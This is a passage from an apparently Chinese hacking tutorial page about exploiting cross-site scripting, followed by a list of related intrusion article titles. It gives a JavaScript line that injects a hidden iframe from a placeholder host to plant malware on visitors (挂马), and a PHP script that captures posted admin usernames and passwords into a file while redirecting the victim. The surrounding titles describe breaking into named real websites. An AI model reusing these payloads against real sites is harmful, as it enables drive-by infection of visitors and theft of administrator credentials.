大家看看返回了什么,直接就可以改页面了,如图6所示。
如果想挂马就更容易了,JS内容改为:
| 以下是引用片段: document.write("<iframe style='display:none;' src='http://xxx.com/xx.htm'%3E%3C/iframe%3E%22); |


| 以下是引用片段: <?php Header("Location: http://127.0.0.1:81/test/index.php?%22); if(isset($_POST['$admin_name'])&&isset($_POST['$admin_pass'])){ $file_path="password.txt"; $file = @fopen($file_path,"a"); $string = "Username:".$_POST['a_name']."and password:".$_POST['a_pass']."\n"; @fwrite($file,$string); @fclose($file); } ?> |

| 利用XSS渗透校内网的过程详解 | 01-28 | |
| Mysql5注射技巧总结 | 01-28 | |
| 对红色黑客联盟的一次检测 | 01-28 | |
| SQL注入高级技巧nowthk篇 | 01-28 | |
| 酷蝶XP留言簿的跨站利用 | 01-28 | |
| 跨站跨出WEBSHELL---网域高科行业 | 01-28 | |
| 黑客如何利用文件包含漏洞进行网 | 01-24 | |
| Dvbbs8.1 0DAY(通杀access和mssq | 01-09 | |
| 辽宁文学艺术网的沦陷-eWebEdit | 01-09 | |
| 入侵网站拿下服务器的实战演示 | 01-09 | |
| 渗透入侵土耳其XXX网站!~ | 12-21 | |
| BBSGood.Speed Version 4.0注入漏 | 12-21 | |